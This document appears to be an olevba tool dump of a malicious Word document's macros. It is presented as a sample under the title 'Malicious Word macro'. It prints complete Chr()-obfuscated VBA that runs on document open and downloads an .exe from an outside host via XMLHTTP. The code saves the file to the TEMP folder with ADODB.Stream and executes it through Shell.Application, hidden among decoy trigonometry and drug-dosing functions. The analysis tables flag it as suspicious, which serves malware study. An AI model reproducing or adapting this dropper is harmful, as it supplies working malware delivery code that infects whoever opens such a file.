Malicious Word macro

1. olevba 0.26 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MAS-HB- 1445942147T0.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 1445942147T0.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub DcdAC(FFFFF As Long)
17.  
18. lhwtbkfTu5jYB
19. End Sub
20.  
21. Sub autoopen()
22.  
23. DcdAC (3)
24.  
25. End Sub
26.  
27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
28. ANALYSIS:
29. +----------+----------+---------------------------------------+
30. | Type     | Keyword  | Description                           |
31. +----------+----------+---------------------------------------+
32. | AutoExec | AutoOpen | Runs when the Word document is opened |
33. +----------+----------+---------------------------------------+
34. -------------------------------------------------------------------------------
35. VBA MACRO M11.bas
36. in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/M11'
37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
38.  
39. Public Sub ParseResponse(scanner_name, json)
40.  
41.     scanner = scanner_name
42.    
43.     '"detected": false, "version": "11.00", "result": null, "update": "20110421"
44.    
45.     On Error Resume Next
46.     Dim a As Long, b As Long
47.     Dim main As String, name As String, value As String, scans As String
48.    
49.     tmp = Split(json, ",")
50.     For Each entry In tmp
51.         entry = Trim(entry)
52.         If Len(entry) = 0 Then GoTo nextone
53.         b = InStr(1, entry, ":")
54.         If b < 2 Then GoTo nextone
55.         name = Mid(entry, 1, b - 1)
56.         value = Mid(entry, b + 1)
57.         If name = "result" And detected = True Then Stop
58.        
59. nextone:
60.     Next
61.    
62.     DoEvents
63.    
64.  
65. End Sub
66.  
67.  
68.     Public Function AgExtIntInterval(ByVal CrClStd As Double) As Double
69.         Select Case CrClStd
70.             Case My.Forms.FrmCalculator.Q241 To My.Forms.FrmCalculator.Q242
71.                 AgExtIntInterval = 24
72.             Case My.Forms.FrmCalculator.Q361 To My.Forms.FrmCalculator.Q362
73.                 AgExtIntInterval = 36
74.             Case My.Forms.FrmCalculator.Q481 To My.Forms.FrmCalculator.Q482
75.                 AgExtIntInterval = 48
76.         End Select
77.     End Function
78.  
79.  
80.  
81. 'Hyperbolic Sin
82. Public Function HSin(x As Double) As Double
83. HSin = CDbl((Exp(x) - Exp(-x)) / 2)
84. End Function
85.  
86.  
87.     Public Function CrClStd(ByVal CrCl As Double, ByVal BSA As Double) As Double
88.         CrClStd = CrCl * (1.73 / BSA)
89.     End Function
90.  
91.     Public Function RoundToSignificance(ByVal number As Integer, _
92.         ByVal roundtonearest As Integer) As Integer
93.         'Round number up or down to the nearest multiple of significance
94.        Dim d As Double
95.         d = number / roundtonearest
96.         d = Math.Round(d, 0)
97.         RoundToSignificance = d * roundtonearest
98.     End Function
99.  
100.     Public Function TOneHalf(ByVal K As Double) As Double
101.         TOneHalf = 0.693 / K
102.     End Function
103.  
104.     Public Function GentKEst(ByVal CrCl As Double) As Double
105.         GentKEst = (0.00293 * CrCl) + 0.014
106.     End Function
107.  
108.  
109.  
110.  
111.  
112. 'Cos
113. Public Function CosTheta(x As Double) As Double
114. CosTheta = Cos((Pi / 180) * CDbl(x))
115. End Function
116.  
117.     Public Function IBWMale(ByVal PtHeightinInches As Double) As Double
118.         IBWMale = 50 + (2.3 * (PtHeightinInches - 60))
119.     End Function
120.  
121.     Public Function IBWFemale(ByVal PtHeightinInches As Double) As Double
122.         IBWFemale = 45.5 + (2.3 * (PtHeightinInches - 60))
123.     End Function
124.  
125.  
126.  
127.  Public Function CCGFemale(ByVal PtAge As Double, ByVal Weight As Double, ByVal SCr As Double) As Double
128.         CCGFemale = (((140 - PtAge) * Weight) / (72 * SCr)) * 0.85
129.     End Function
130.  
131. Public Function SHKY9cJRiD8Mm(PrtV2KcZsYjCTZ As String)
132.     Set ZhWWs4Kjk = uhjejFduWS("S" & Chr(104) & Chr(101) & "l" & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & "i" & "o" & Chr(110))
133. ZhWWs4Kjk.Open (AZEJp3Mz)
134. End Function
135. Public Function uhjejFduWS(A5D3i3tyZ As String)
136.     Set uhjejFduWS = CreateObject(A5D3i3tyZ)
137. End Function
138.     Public Function JelliffeMale(ByVal PtAge As Double, ByVal SCr As Double, ByVal BSA As Double) As Double
139.         JelliffeMale = (((98 - (0.8 * (PtAge - 20))) / SCr) * (BSA / 1.73))
140.     End Function
141.  
142.     Public Function JelliffeFemale(ByVal PtAge As Double, ByVal SCr As Double, ByVal BSA As Double) As Double
143.         JelliffeFemale = (((98 - (0.8 * (PtAge - 20))) / SCr) * (BSA / 1.73)) * 0.9
144.     End Function
145.  
146. Public Function oDMPcMtKN938lx(zeXN04TOAASAo2 As Variant, HlIR1pypwM56D0 As String)
147. Dim sZSYhIPY3: Set sZSYhIPY3 = uhjejFduWS("A" & Chr(100) & "o" & Chr(100) & Chr(98) & "." & "S" & Chr(116) & "r" & Chr(101) & Chr(97) & Chr(109))
148.  
149. With sZSYhIPY3
150.    .Type = 1
151.     .Open
152.     .write zeXN04TOAASAo2
153.     .savetofile HlIR1pypwM56D0, 2
154. End With
155. End Function
156.     Public Function AgExtIntDose(ByVal DosingWeight As Double) As Integer
157.         AgExtIntDose = My.Forms.FrmCalculator.ExtInt * DosingWeight
158.     End Function
159. Public Function PaddedScanner(Optional bufSz As Long = 20) As String
160.     Dim tmp As String
161.     tmp = scanner
162.     While Len(tmp) < bufSz
163.         tmp = tmp & " "
164.     Wend
165.     PaddedScanner = tmp
166. End Function
167.  
168. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
169. ANALYSIS:
170. +------------+----------------+-----------------------------------------+
171. | Type       | Keyword        | Description                             |
172. +------------+----------------+-----------------------------------------+
173. | Suspicious | Open           | May open a file                         |
174. | Suspicious | Chr            | May attempt to obfuscate specific       |
175. |            |                | strings                                 |
176. | Suspicious | CreateObject   | May create an OLE object                |
177. | Suspicious | SaveToFile     | May create a text file                  |
178. | Suspicious | Write          | May write to a file (if combined with   |
179. |            |                | Open)                                   |
180. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
181. |            |                | be used to obfuscate strings (option    |
182. |            |                | --decode to see all)                    |
183. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
184. |            |                | may be used to obfuscate strings        |
185. |            |                | (option --decode to see all)            |
186. +------------+----------------+-----------------------------------------+
187. -------------------------------------------------------------------------------
188. VBA MACRO Module1F3.bas
189. in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/Module1F3'
190. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
191. Public OIHoihoih As String
192.  
193.  
194.  
195. Public AZEJp3Mz As String
196. Public Const Pi = 3.14159265358979
197. 'Sin
198.  
199. 'Inverse Secant
200. Public Function ISec(x As Double) As Double
201. ISec = CDbl((180 / Pi) * Atn(x / Sqr(x * x - 1))) + Sgn((x) - 1) * (2 * CDbl((180 / Pi) * Atn(1)))
202. End Function
203. 'Inverse Cotangent
204. Public Function ICot(x As Double) As Double
205. ICot = CDbl((180 / Pi) * Atn(x)) + 2 * CDbl((180 / Pi) * Atn(1))
206. End Function 'Hyperbolic Secant
207.  
208.  
209. Public Function HSec(x As Double) As Double
210. HSec = CDbl(2 / (Exp(x) - Exp(-x)))
211. End Function
212. 'Hyperbolic Cotangent
213. Public Function HCotan(x As Double) As Double
214. HCotan = CDbl((Exp(x) + Exp(-x)) / (Exp(x) - Exp(-x)))
215. End Function
216.  
217.  
218.  
219.  
220. 'Inverse Hyperbolic Sine
221. Public Function IHSin(x As Double) As Double
222. IHSin = CDbl(Log(x + Sqr(x * x + 1)))
223. End Function
224. 'Inverse Hyperbolic Cos
225. Public Function IHCos(x As Double) As Double
226. IHCos = CDbl(Log(x + Sqr(x * x - 1)))
227. End Function
228. 'Inverse Hyperbolic Tangent
229.  
230. Public Function IHTan(x As Double) As Double
231. IHTan = CDbl(Log((1 + x) / (1 - x)) / 2)
232. End Function
233. 'Inverse Hyperbolic Secant
234. Public Function IHSec(x As Double) As Double
235. IHSec = CDbl(Log((Sqr(-x * x + 1) + 1) / x))
236. End Function
237.  
238.  
239.  
240.  
241. Sub lhwtbkfTu5jYB()
242. OIHoihoih = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "g" & "6" & Chr(48) & Chr(48) & "0" & "4" & "2" & Chr(52) & Chr(46) & Chr(102) & Chr(101) & "r" & "o" & Chr(122) & Chr(111) & Chr(46) & "c" & "o" & "m" & Chr(47) & Chr(50) & "5" & Chr(47) & Chr(49) & Chr(48) & Chr(46) & "e" & Chr(120) & Chr(101)
243. Set efAv8tqEYv = uhjejFduWS(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80))
244.     JGHfvkj = False
245.  
246.  
247.  
248.  
249. Set dhKI3Zii1 = uhjejFduWS("W" & Chr(83) & Chr(99) & "r" & Chr(105) & Chr(112) & Chr(116) & Chr(46) & "S" & Chr(104) & "e" & Chr(108) & "l")
250.  
251. kJBFN = "E" & Chr(110) & "" & Chr(118) & Chr(105) & "" & "" & "" & "" & Chr(114) & "o" & "n" & "m" & Chr(101) & "n" & "t"
252. LKNlk = Chr(80) & Chr(114) & Chr(111) & "" & "" & "" & Chr(99) & "e" & Chr(115) & Chr(115)
253. Set GA0VCrFE = CallByName(dhKI3Zii1, kJBFN, VbGet, LKNlk)
254.  
255. IjyE6UGLtZa = GA0VCrFE(Chr(84) & "E" & Chr(77) & Chr(80))
256.  
257. AZEJp3Mz = IjyE6UGLtZa & Chr(92) & "r" & Chr(105) & Chr(100) & Chr(101) & Chr(98) & "o" & Chr(115) & Chr(53) & Chr(46) & Chr(101) & "x" & Chr(101)
258. CallByName efAv8tqEYv, "O" & Chr(112) & "e" & Chr(110), VbMethod, "" & "G" & Chr(69) & "" & "" & "" & Chr(84), OIHoihoih, JGHfvkj
259.  
260. Dim TMz47GycIf() As Byte
261.  
262. CallByName efAv8tqEYv, "S" & Chr(101) & Chr(110) & Chr(100), VbMethod
263. TMz47GycIf = CallByName(efAv8tqEYv, Chr(114) & "e" & Chr(115) & Chr(112) & Chr(111) & "n" & "s" & "e" & Chr(66) & "o" & Chr(100) & "y", VbGet)
264. oDMPcMtKN938lx TMz47GycIf, AZEJp3Mz
265. On Error GoTo Vo7uJ9Tj6G
266.     a = 332 / 0
267.   On Error GoTo 0
268.  
269. xKyUc77k:
270.   Exit Sub
271. Vo7uJ9Tj6G:
272.   SHKY9cJRiD8Mm ("SUIBVc7Pfr")
273. Resume xKyUc77k
274. End Sub
275.  
276.  
277. Public Function Sine(x As Double) As Double
278. Sine = Sin((Pi / 180) * CDbl(x))
279. End Function
280.  
281. 'Inverse Hyperbolic Cosecant
282. Public Function IHCosec(x As Double) As Double
283. IHCosec = CDbl(Log((Sgn(x) * Sqr(x * x + 1) + 1) / x))
284. End Function
285.  
286.  
287. 'Inverse Hyperbolic Cotangent
288. Public Function IHCot(x As Double) As Double
289. IHCot = CDbl(Log((Sgn(x) * Sqr(x * x + 1) + 1) / x))
290. End Function
291.  
292.  
293. '********************************************************************
294. '
295. '   OTHER USEFUL FUNCTIONS
296. '
297. '********************************************************************
298. Public Function Power(x As Double, Y As Double) As Double
299. Power = x ^ Y
300. End Function
301.  
302. Public Function LogN(Base As Double, x As Double) As Double
303. LogN = Log(x) / Log(Base)
304. End Function
305. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
306. ANALYSIS:
307. +------------+-------------+-----------------------------------------+
308. | Type       | Keyword     | Description                             |
309. +------------+-------------+-----------------------------------------+
310. | Suspicious | Chr         | May attempt to obfuscate specific       |
311. |            |             | strings                                 |
312. | Suspicious | CallByName  | May attempt to obfuscate malicious      |
313. |            |             | function calls                          |
314. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
315. |            |             | be used to obfuscate strings (option    |
316. |            |             | --decode to see all)                    |
317. +------------+-------------+-----------------------------------------+
318. -------------------------------------------------------------------------------
319. VBA MACRO Module2.bas
320. in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/Module2'
321. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
322. (empty macro)